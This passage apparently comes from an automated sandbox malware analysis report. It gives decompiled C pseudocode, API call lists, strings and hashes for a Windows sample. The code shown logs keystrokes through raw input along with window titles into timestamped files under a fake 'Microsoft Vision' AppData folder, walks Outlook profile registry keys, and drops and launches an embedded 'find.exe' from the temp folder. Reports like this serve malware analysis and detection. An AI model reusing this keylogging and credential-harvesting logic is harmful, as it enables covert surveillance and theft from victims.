													_v644 = _t198;
													__eflags = _t142;
													if(_t142 == 0) {
														goto L17;
													} else {
														 *((intOrPtr*)(_t101 + 0xa10)) = 1;
													}
												}
												_t46 = _t104 + 0xc; // 0x1f70000
												_t105 = CreateFileW( *_t46, 4, 1, _t198, 4, 0x80, _t198);
												_t178 =  *0x4166ac; // 0x416d98
												 *(_t178 + 4) = _t105;
												__eflags =  *((intOrPtr*)(_t178 + 0xa10)) - _t198;
												if(__eflags == 0) {
													_t49 = _t178 + 8; // 0x416da0
													_t204 = L"\r\n";
													_t116 = lstrlenW(_t204);
													_t117 =  *0x4166ac; // 0x416d98
													_t50 = _t117 + 4; // 0x268
													WriteFile( *_t50, _t204, _t116, _t49, _t198);
													_t119 =  *0x4166ac; // 0x416d98
													_t121 = lstrlenW(_t204);
													_t122 =  *0x4166ac; // 0x416d98
													_t51 = _t122 + 4; // 0x268
													WriteFile( *_t51, _t204, _t121, _t119 + 8, _t198);
													_t124 =  *0x4166ac; // 0x416d98
													_t126 = E00403027( &_v632);
													_t128 =  *0x4166ac; // 0x416d98
													_t54 = _t128 + 4; // 0x268
													WriteFile( *_t54, _v632, _t126 + _t126, _t124 + 8, _t198);
													_t130 =  *0x4166ac; // 0x416d98
													_t206 = L"\r\n";
													_t132 = lstrlenW(_t206);
													_t133 =  *0x4166ac; // 0x416d98
													_t55 = _t133 + 4; // 0x268
													WriteFile( *_t55, _t206, _t132, _t130 + 8, _t198);
													_t135 =  *0x4166ac; // 0x416d98
													_t136 = _t135 + 8;
													__eflags = _t136;
													_t137 = lstrlenW(_t206);
													_t138 =  *0x4166ac; // 0x416d98
													_t56 = _t138 + 4; // 0x268
													WriteFile( *_t56, _t206, _t137, _t136, _t198);
													_t178 =  *0x4166ac; // 0x416d98
												}
												_t58 = _t178 + 8; // 0x416da0
												_t109 = lstrlenW(E00407EC8( *((intOrPtr*)(_v616 + 0x16)), __eflags)) + _t108;
												__eflags = _t109;
												_t110 = E00407EC8( *((intOrPtr*)(_v616 + 0x16)), _t109);
												_t111 =  *0x4166ac; // 0x416d98
												_t61 = _t111 + 4; // 0x268
												WriteFile( *_t61, _t110, _t109, _t58, _t198);
												_t113 =  *0x4166ac; // 0x416d98
												_t62 = _t113 + 4; // 0x268
												CloseHandle( *_t62);
											}
											E004058FB(_v620);
											_v620 = _t198;
											E004058FB(_v632);
											_t201 = _v644;
										}
									}
								}
							}
						} else {
							_t198 = DefWindowProcA(_a4, _a8, _a12, _a16);
						}
					}
				}
				E004058FB(_t201);
				return _t198;
			}

0x00407b3d
0x00407b4a
0x00407b4e
0x00407b56
0x00407b59
0x00407b5b
0x00407b5f
0x00407b62
0x00407e8b
0x00407e8e
0x00407e96
0x00407e99
0x00407ea3
0x00407eab
0x00407eb0
0x00407b68
0x00407b68
0x00407b6b
0x00407e81
0x00407b71
0x00407b76
0x00407b93
0x00407ba1
0x00407ba7
0x00407baa
0x00407bb9
0x00407bbb
0x00407bbf
0x00407bc1
0x00407bc9
0x00407bd7
0x00407bdd
0x00407be1
0x00407be7
0x00407bee
0x00407c05
0x00407c0b
0x00407c0d
0x00407c3b
0x00407c0f
0x00407c22
0x00407c2b
0x00407c2b
0x00407c47
0x00407c55
0x00407c5a
0x00407c67
0x00407c6c
0x00407c71
0x00407c73
0x00407c75
0x00407c78
0x00407c80
0x00407c8c
0x00407c91
0x00407c9d
0x00407ca5
0x00407cae
0x00407cb7
0x00407cbc
0x00407cc3
0x00407cc9
0x00407cd2
0x00407cd7
0x00407cd7
0x00407cdc
0x00407ce2
0x00407cee
0x00407cf7
0x00407cf9
0x00407cfe
0x00407d39
0x00407d3d
0x00407d3d
0x00407d43
0x00407d49
0x00407d4e
0x00407d00
0x00407d14
0x00407d1f
0x00407d24
0x00407d29
0x00407d2d
0x00407d2f
0x00000000
0x00407d31
0x00407d31
0x00407d31
0x00407d2f
0x00407d60
0x00407d63
0x00407d69
0x00407d75
0x00407d78
0x00407d7e
0x00407d85
0x00407d88
0x00407d8f
0x00407d96
0x00407d9c
0x00407d9f
0x00407da1
0x00407dac
0x00407db3
0x00407db9
0x00407dbc
0x00407dbe
0x00407dd0
0x00407dd8
0x00407dde
0x00407de1
0x00407de3
0x00407de8
0x00407df3
0x00407dfa
0x00407e00
0x00407e03
0x00407e05
0x00407e0b
0x00407e0b
0x00407e10
0x00407e17
0x00407e1d
0x00407e20
0x00407e22
0x00407e22
0x00407e2c
0x00407e43
0x00407e43
0x00407e46
0x00407e4c
0x00407e51
0x00407e54
0x00407e56
0x00407e5b
0x00407e5e
0x00407e5e
0x00407e68
0x00407e71
0x00407e75
0x00407e7a
0x00407e7a
0x00407bee
0x00407be1
0x00407bc1
0x00407b78
0x00407b8a
0x00407b8a
0x00407b76
0x00407b6b
0x00407eb8
0x00407ec5

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 00407B84
GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00407BA1
GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00407BD7
GetForegroundWindow.USER32 ref: 00407BF4
GetWindowTextW.USER32 ref: 00407C05
lstrlenW.KERNEL32(00416B88,00416D88,?,Unknow), ref: 00407CEE
PostQuitMessage.USER32 ref: 00407E81
RegisterRawInputDevices.USER32 ref: 00407EB0

Strings

Unknow, xrefs: 00407C32

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
String ID: Unknow
API String ID: 3853268301-1240069140
Opcode ID: 878580e6619826a15b31a56a49ed1ffb6a430dfa9939ff47c25cfcecec706822
Instruction ID: ed6d52860f336a14c355bf99705e32785600692f8a2995653f26284368457ea2
Opcode Fuzzy Hash: 878580e6619826a15b31a56a49ed1ffb6a430dfa9939ff47c25cfcecec706822
Instruction Fuzzy Hash: FDA17C71504200AFCB00EF65DC85DAB7BA8FF88305F04857AF949E72A1CB75E915CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004080AA Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 229
windowstringregistryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004080AA(void* __eflags, void* _a4) {
				short _v544;
				char _v696;
				short _v704;
				intOrPtr _v720;
				struct _WNDCLASSW _v760;
				void* _v784;
				struct tagMSG _v788;
				struct _SYSTEMTIME _v804;
				void* _v808;
				struct HINSTANCE__* _v812;
				long _v820;
				intOrPtr _t54;
				intOrPtr _t57;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t65;
				intOrPtr _t68;
				intOrPtr _t73;
				struct HWND__* _t77;
				int _t81;
				intOrPtr _t102;
				void* _t103;
				intOrPtr _t107;
				void* _t115;
				void* _t121;
				struct HINSTANCE__* _t122;
				struct HWND__* _t123;
				intOrPtr _t125;
				signed int _t126;
				signed int _t132;
				intOrPtr _t135;
				intOrPtr _t138;
				void* _t146;
				void* _t147;
				long _t151;
				void* _t156;
				void* _t157;
				signed int _t159;
				signed int _t160;
				void* _t162;
				signed int _t163;
				void* _t168;

				_t122 = GetModuleHandleA(0);
				_v804.wSecond = _t122;
				_v788.hwnd = _v788.hwnd & 0;
				_t126 = 0xa;
				memset( &(_v760.hIcon), 0, _t126 << 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t54 =  *0x4166ac; // 0x416d98
				_t151 = 0;
				E00401052(_t54 + 0x210, 0, 0x800);
				_t57 =  *0x4166ac; // 0x416d98
				E00401052(_t57 + 0x10, 0, 0x208);
				_t60 =  *0x4166ac; // 0x416d98
				_t168 = (_t163 & 0xfffffff8) - 0x314 + 0x24;
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t60 + 0x10, _t147, _t157, _t121);
				_t62 =  *0x4166ac; // 0x416d98
				lstrcatW(_t62 + 0x10, L"\\Microsoft Vision\\");
				_t65 =  *0x4166ac; // 0x416d98
				CreateDirectoryW(_t65 + 0x10, 0);
				_t68 =  *0x4166ac; // 0x416d98
				_t171 =  *((intOrPtr*)(_t68 + 0xa14));
				if( *((intOrPtr*)(_t68 + 0xa14)) != 0) {
					E00401052( &_v544, 0, 0x208);
					_t107 =  *0x4166ac; // 0x416d98
					_t168 = _t168 + 0xc;
					lstrcpyW( &_v544, _t107 + 0x10);
					lstrcatW( &_v544, "*");
					E004033AB(_t168,  &_v544);
					_t115 = E0040DA4F( &(_v760.lpszClassName), _t171, 0);
					_t125 =  *0x4166ac; // 0x416d98
					_t156 = _t115;
					_t13 = _t125 + 0xa18; // 0x4177b0
					E00401815(_t13, _t171);
					_t162 = 0;
					if( *((intOrPtr*)(_t156 + 8)) > 0) {
						do {
							_t168 = _t168 - 0x18;
							E00401862(_t156, _t168, _t162);
							_t15 = _t125 + 0xa18; // 0x4177b0
							E00401716(_t15);
							_t162 = _t162 + 1;
						} while (_t162 <  *((intOrPtr*)(_t156 + 8)));
					}
					_t143 = _v720;
					if(_v720 != 0) {
						E00401A75(_t143, _t143);
					}
					_t122 = _v812;
					_t151 = 0;
				}
				_t146 = 4;
				_t159 = E0040326D( &_v812, _t146, 0);
				E004030FB(E00403230( &_v808, _t146, 0, L"ExplorerIdentifier"), 0, _t159);
				E004058FB(_v820);
				_t73 =  *0x4166ac; // 0x416d98
				_v820 = _t151;
				if( *((intOrPtr*)(_t73 + 0xa14)) != _t151) {
					GetLocalTime( &_v804);
					wsprintfW( &_v704, L"%02d-%02d-%02d_%02d.%02d.%02d", _v804.wDay & 0x0000ffff, _v804.wMonth & 0x0000ffff, _v804.wYear & 0x0000ffff, _v804.wHour & 0x0000ffff, _v804.wMinute & 0x0000ffff, _v804.wSecond & 0x0000ffff);
					_t135 =  *0x4166ac; // 0x416d98
					_t168 = _t168 + 0x20;
					_t33 = _t135 + 0x10; // 0x416da8
					E00403230(E00403230(_t135 + 0xc, _t146, _t135 + 0xc, _t33), _t146, _t135 + 0xc,  &_v696);
					_t102 =  *0x4166ac; // 0x416d98
					_t34 = _t102 + 0xc; // 0x1f70000
					_t103 = CreateFileW( *_t34, 0x10000000, 1, _t151, 2, 0x80, _t151);
					_t138 =  *0x4166ac; // 0x416d98
					 *(_t138 + 4) = _t103;
					CloseHandle(_t103);
				}
				_v760.lpszClassName = _v808;
				_v760.lpfnWndProc = E00407B2E;
				_v760.hInstance = _t122;
				RegisterClassW( &_v760);
				_t77 = CreateWindowExW(_t151, _v760.lpszClassName, _t151, _t151, _t151, _t151, _t151, _t151, 0xfffffffd, _t151, _t122, _a4);
				_t132 = 7;
				_t123 = _t77;
				memset( &_v788, 0, _t132 << 2);
				_t81 = GetMessageA( &_v788, _t123, 0, 0);
				if(_t81 == 0) {
					L12:
					_t160 = _v788.wParam;
				} else {
					_t160 = _t159 | 0xffffffff;
					while(_t81 != _t160) {
						TranslateMessage( &_v788);
						DispatchMessageA( &_v788);
						_t81 = GetMessageA( &_v788, _t123, 0, 0);
						if(_t81 != 0) {
							continue;
						} else {
							goto L12;
						}
						goto L13;
					}
				}
				L13:
				E004058FB(_v808);
				return _t160;
			}

0x004080c1
0x004080c9
0x004080cd
0x004080d3
0x004080d4
0x004080da
0x004080e0
0x004080e1
0x004080e2
0x004080e3
0x004080e8
0x004080f1
0x004080f6
0x00408108
0x0040810d
0x00408112
0x0040811e
0x00408124
0x00408138
0x0040813a
0x00408144
0x0040814a
0x0040814f
0x00408155
0x00408169
0x0040816e
0x00408173
0x00408182
0x00408195
0x004081a2
0x004081ab
0x004081b0
0x004081b6
0x004081b9
0x004081bf
0x004081c4
0x004081c9
0x004081cb
0x004081cb
0x004081d4
0x004081d9
0x004081df
0x004081e4
0x004081e5
0x004081cb
0x004081ea
0x004081f0
0x004081f3
0x004081f3
0x004081f8
0x004081fc
0x004081fc
0x00408200
0x00408213
0x0040821d
0x00408226
0x0040822b
0x00408230
0x0040823a
0x00408245
0x0040827c
0x00408282
0x0040828f
0x00408293
0x004082a1
0x004082a6
0x004082bb
0x004082be
0x004082c4
0x004082cb
0x004082ce
0x004082ce
0x004082d8
0x004082e1
0x004082e9
0x004082ed
0x00408308
0x00408310
0x00408311
0x0040831b
0x00408329
0x0040832d
0x0040835c
0x0040835c
0x0040832f
0x0040832f
0x00408332
0x0040833b
0x00408346
0x00408356
0x0040835a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040835a
0x00408332
0x00408360
0x00408364
0x00408371

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 004080BB
SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,00416D88), ref: 0040811E
lstrcatW.KERNEL32 ref: 00408138
CreateDirectoryW.KERNEL32(00416D88,00000000), ref: 00408144
lstrcpyW.KERNEL32(?,00416D88), ref: 00408182
lstrcatW.KERNEL32 ref: 00408195

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

Part of subcall function 0040DA4F: FindFirstFileW.KERNEL32(?,?), ref: 0040DA7C

GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 00408245
wsprintfW.USER32 ref: 0040827C
CreateFileW.KERNEL32(01F70000,10000000,00000001,00000000,00000002,00000080,00000000), ref: 004082BE
CloseHandle.KERNEL32(00000000), ref: 004082CE
RegisterClassW.USER32 ref: 004082ED
CreateWindowExW.USER32 ref: 00408308
GetMessageA.USER32 ref: 00408329
TranslateMessage.USER32(?), ref: 0040833B
DispatchMessageA.USER32 ref: 00408346
GetMessageA.USER32 ref: 00408356

Strings

\Microsoft Vision\, xrefs: 00408132
ExplorerIdentifier, xrefs: 0040820A
%02d-%02d-%02d_%02d.%02d.%02d, xrefs: 00408276
C:\Users\user\AppData\Local\Microsoft Vision\05-01-2023_12.32.23, xrefs: 00408299

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Message$Create$FileHandlelstrcatlstrcpylstrlen$ClassCloseDirectoryDispatchFindFirstFolderLocalModulePathRegisterTimeTranslateWindowwsprintf
String ID: %02d-%02d-%02d_%02d.%02d.%02d$C:\Users\user\AppData\Local\Microsoft Vision\05-01-2023_12.32.23$ExplorerIdentifier$\Microsoft Vision\
API String ID: 2678186124-423040666
Opcode ID: 2d8d0eb04a9ae61cb7b38fce995887743f4f9dc18ce061417351f8168c574850
Instruction ID: d3391ab1d8b0e75b663357389b2e2ee8065fb15395a77d3dc1c98ebc9ef9420a
Opcode Fuzzy Hash: 2d8d0eb04a9ae61cb7b38fce995887743f4f9dc18ce061417351f8168c574850
Instruction Fuzzy Hash: 8471B072504300ABC710EB65DC49E9BB7ECEF88704F00893EF685E7291DA79D915CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00408BF6 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 160
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00408BF6(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr _v20;
				short _v4116;
				short _v8212;
				short _v12308;
				long _t68;
				int _t74;
				intOrPtr _t75;
				void* _t76;
				short* _t80;

				_t76 = __edx;
				_t75 = __ecx;
				E00401130(0x3014, __ecx);
				_v20 = _t75;
				_t74 = 0;
				E00401052( &_v4116, 0, 0x800);
				E00401052( &_v8212, 0, 0x800);
				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8) != 0) {
					__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
					if(__eflags != 0) {
						__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
						if(__eflags != 0) {
							_t80 = L"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676";
							__eflags = RegOpenKeyExW(0x80000001, _t80, 0, 0xf003f,  &_v8);
							if(__eflags != 0) {
								L15:
								__eflags = 0;
								return 0;
							}
							_push(_t80);
							L8:
							lstrcpyW( &_v4116, ??);
							if(RegQueryInfoKeyW(_v8, _t74, _t74, _t74,  &_v16,  &_v12, _t74, _t74, _t74, _t74, _t74, _t74) != 0) {
								goto L15;
							}
							if(_v16 <= _t74) {
								L14:
								return 1;
							} else {
								goto L10;
							}
							while(1) {
								L10:
								_v12 = 0x800;
								if(RegEnumKeyExW(_v8, _t74,  &_v12308,  &_v12, 0, 0, 0, 0) != 0) {
									goto L15;
								}
								RegCloseKey(_v8);
								lstrcpyW( &_v8212,  &_v4116);
								lstrcatW( &_v8212, "\\");
								lstrcatW( &_v8212,  &_v12308);
								_t68 = RegOpenKeyExW(0x80000001,  &_v8212, 0, 0xf003f,  &_v8);
								_t90 = _t68;
								if(_t68 != 0) {
									goto L15;
								}
								_push(_t75);
								_t75 = _v20;
								E00408DB8(_t75, _t76, _t90, _v8);
								RegCloseKey(_v8);
								if(RegOpenKeyExW(0x80000001,  &_v4116, 0, 0xf003f,  &_v8) != 0) {
									goto L15;
								}
								_t74 = _t74 + 1;
								if(_t74 < _v16) {
									continue;
								}
								goto L14;
							}
							goto L15;
						}
						_push(L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676");
						goto L8;
					}
					_push(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
					goto L8;
				}
				_push(L"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
				goto L8;
			}

0x00408bf6
0x00408bf6
0x00408bfe
0x00408c0b
0x00408c0f
0x00408c19
0x00408c2a
0x00408c51
0x00408c6c
0x00408c6e
0x00408c89
0x00408c8b
0x00408c9a
0x00408ca7
0x00408ca9
0x00408db1
0x00408db1
0x00000000
0x00408db1
0x00408caf
0x00408cb0
0x00408cbd
0x00408cdb
0x00000000
0x00000000
0x00408ce4
0x00408dac
0x00000000
0x00000000
0x00000000
0x00000000
0x00408cea
0x00408cea
0x00408cec
0x00408d0e
0x00000000
0x00000000
0x00408d17
0x00408d2b
0x00408d39
0x00408d4d
0x00408d6a
0x00408d6c
0x00408d6e
0x00000000
0x00000000
0x00408d70
0x00408d74
0x00408d77
0x00408d7f
0x00408da0
0x00000000
0x00000000
0x00408da2
0x00408da6
0x00000000
0x00000000
0x00000000
0x00408da6
0x00000000
0x00408cea
0x00408c8d
0x00000000
0x00408c8d
0x00408c70
0x00000000
0x00408c70
0x00408c53
0x00000000

APIs

RegOpenKeyExW.ADVAPI32 ref: 00408C4D
RegOpenKeyExW.ADVAPI32 ref: 00408C6A
lstrcpyW.KERNEL32(?,Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676), ref: 00408CBD
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408CD3
RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000), ref: 00408D06
RegCloseKey.ADVAPI32(?), ref: 00408D17
lstrcpyW.KERNEL32(?,?), ref: 00408D2B
lstrcatW.KERNEL32 ref: 00408D39
lstrcatW.KERNEL32 ref: 00408D4D
RegOpenKeyExW.ADVAPI32 ref: 00408D6A
RegCloseKey.ADVAPI32(?), ref: 00408D7F
RegOpenKeyExW.ADVAPI32 ref: 00408D9C

Strings

Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 00408C7D, 00408C8D
Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00408C43
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00408C60, 00408C70
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00408C9A, 00408C9F, 00408CAF
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00408C53

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
API String ID: 1891545080-2020977430
Opcode ID: 6390e3d158b97c03608cfc6f2d33eca44b2fd2720ea8140068109654491e0c6a
Instruction ID: 36bb1415bf3775e9a0181c12a18c835e4935d6713fb098edef68003d53ce56a5
Opcode Fuzzy Hash: 6390e3d158b97c03608cfc6f2d33eca44b2fd2720ea8140068109654491e0c6a
Instruction Fuzzy Hash: D6413DB190011DBEEB20DB918D45EEB7B7CEF14344F1005BABA45E2051EA789F949A74

Uniqueness

Uniqueness Score: -1.00%

Function 004106E2 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 128
filestringCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004106E2(void* __eax, void* __ebx, void* __ecx, void* __esi, long _a4) {
				intOrPtr* _v8;
				long _v12;
				struct _SHELLEXECUTEINFOA _v72;
				char _v1096;
				char _v2120;
				char _v3144;
				void* _t40;
				void* _t42;
				void* _t71;
				void* _t77;
				void* _t90;
				struct HRSRC__* _t91;
				void* _t94;

				_t90 = __esi + 1;
				_t77 = __ecx + 1;
				 *((intOrPtr*)(__ebx + 0x86183c1)) =  *((intOrPtr*)(__ebx + 0x86183c1)) + _t77;
				_t71 = __ebx + __eax;
				_push(_t71);
				_push(_t90);
				_t82 =  *_a4;
				_t72 = _t77 + 4;
				_v8 = _t77 + 4;
				E004031FD(_t72, E0040F56D( &_a4,  *_a4 + 4,  *_t82));
				E004058FB(_a4);
				_t91 = FindResourceW(0, 0x67, L"WM_FIND");
				_t40 = LoadResource(0, _t91);
				_a4 = SizeofResource(0, _t91);
				_t42 = LockResource(_t40);
				E00401052( &_v1096, 0, 0x400);
				E00401052( &_v2120, 0, 0x400);
				GetTempPathA(0x400,  &_v1096);
				lstrcatA( &_v1096, "find.exe");
				GetTempPathA(0x400,  &_v2120);
				lstrcatA( &_v2120, "find.db");
				_t94 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
				WriteFile(_t94, _t42, _a4,  &_v12, 0);
				CloseHandle(_t94);
				E00401052( &_v3144, 0, 0x400);
				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
				_v72.cbSize = 0x3c;
				_v72.lpFile =  &_v1096;
				_v72.fMask = 0x40;
				asm("xorps xmm0, xmm0");
				_v72.lpParameters =  &_v3144;
				asm("movlpd [ebp-0x20], xmm0");
				asm("movlpd [ebp-0x18], xmm0");
				asm("movlpd [ebp-0x10], xmm0");
				_v72.hwnd = 0;
				_v72.lpVerb = 0;
				_v72.lpDirectory = 0;
				_v72.nShow = 0;
				_v72.hInstApp = 0;
				return ShellExecuteExA( &_v72);
			}

0x004106e2
0x004106e3
0x004106e4
0x004106ea
0x004106f8
0x004106f9
0x004106fb
0x004106fd
0x00410703
0x00410714
0x0041071c
0x00410731
0x00410735
0x00410746
0x00410749
0x00410760
0x0041076f
0x00410785
0x00410799
0x004107a7
0x004107b5
0x004107d7
0x004107e2
0x004107e9
0x004107fc
0x00410819
0x00410825
0x0041082c
0x00410838
0x0041083f
0x00410842
0x00410848
0x0041084e
0x00410853
0x00410858
0x0041085b
0x0041085e
0x00410861
0x00410864
0x00410871

APIs

Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

FindResourceW.KERNEL32(00000000,00000067,WM_FIND,00000000), ref: 0041072B
LoadResource.KERNEL32(00000000,00000000), ref: 00410735
SizeofResource.KERNEL32(00000000,00000000), ref: 0041073F
LockResource.KERNEL32(00000000), ref: 00410749
GetTempPathA.KERNEL32(00000400,?), ref: 00410785
lstrcatA.KERNEL32(?,find.exe), ref: 00410799
GetTempPathA.KERNEL32(00000400,?), ref: 004107A7
lstrcatA.KERNEL32(?,find.db), ref: 004107B5
CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 004107D0
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004107E2
CloseHandle.KERNEL32(00000000), ref: 004107E9
wsprintfA.USER32 ref: 00410819
ShellExecuteExA.SHELL32(0000003C), ref: 00410867

Strings

@, xrefs: 00410838
find.exe, xrefs: 00410793
-w %ws -d C -f %s, xrefs: 00410813
find.db, xrefs: 004107A9
WM_FIND, xrefs: 00410721
<, xrefs: 00410825

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFindFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
String ID: -w %ws -d C -f %s$<$@$WM_FIND$find.db$find.exe
API String ID: 2851928664-3107137372
Opcode ID: 68ef4856930893ecc8bb8d035c63973616b061e0d02d0fa7959df2e9ec38db0a
Instruction ID: e1574f1f83d9bde2f99974769469830fce29d3d25454b2289c7f69e45333d6b7
Opcode Fuzzy Hash: 68ef4856930893ecc8bb8d035c63973616b061e0d02d0fa7959df2e9ec38db0a
Instruction Fuzzy Hash: 22414AB1900219BBDB10DFA1DD85FDEBBBCEF89304F10416AF609E2151DAB45A458BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004106EC Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 124
filestringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004106EC(void* __ecx, void* __eflags, long _a4) {
				intOrPtr* _v8;
				long _v12;
				struct _SHELLEXECUTEINFOA _v72;
				char _v1096;
				char _v2120;
				char _v3144;
				void* _t37;
				void* _t39;
				struct HRSRC__* _t80;
				void* _t83;

				_t75 =  *_a4;
				_t67 = __ecx + 4;
				_v8 = __ecx + 4;
				E004031FD(_t67, E0040F56D( &_a4,  *_a4 + 4,  *_t75));
				E004058FB(_a4);
				_t80 = FindResourceW(0, 0x67, L"WM_FIND");
				_t37 = LoadResource(0, _t80);
				_a4 = SizeofResource(0, _t80);
				_t39 = LockResource(_t37);
				E00401052( &_v1096, 0, 0x400);
				E00401052( &_v2120, 0, 0x400);
				GetTempPathA(0x400,  &_v1096);
				lstrcatA( &_v1096, "find.exe");
				GetTempPathA(0x400,  &_v2120);
				lstrcatA( &_v2120, "find.db");
				_t83 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
				WriteFile(_t83, _t39, _a4,  &_v12, 0);
				CloseHandle(_t83);
				E00401052( &_v3144, 0, 0x400);
				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
				_v72.cbSize = 0x3c;
				_v72.lpFile =  &_v1096;
				_v72.fMask = 0x40;
				asm("xorps xmm0, xmm0");
				_v72.lpParameters =  &_v3144;
				asm("movlpd [ebp-0x20], xmm0");
				asm("movlpd [ebp-0x18], xmm0");
				asm("movlpd [ebp-0x10], xmm0");
				_v72.hwnd = 0;
				_v72.lpVerb = 0;
				_v72.lpDirectory = 0;
				_v72.nShow = 0;
				_v72.hInstApp = 0;
				return ShellExecuteExA( &_v72);
			}

0x004106fb
0x004106fd
0x00410703
0x00410714
0x0041071c
0x00410731
0x00410735
0x00410746
0x00410749
0x00410760
0x0041076f
0x00410785
0x00410799
0x004107a7
0x004107b5
0x004107d7
0x004107e2
0x004107e9
0x004107fc
0x00410819
0x00410825
0x0041082c
0x00410838
0x0041083f
0x00410842
0x00410848
0x0041084e
0x00410853
0x00410858
0x0041085b
0x0041085e
0x00410861
0x00410864
0x00410871

APIs

Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

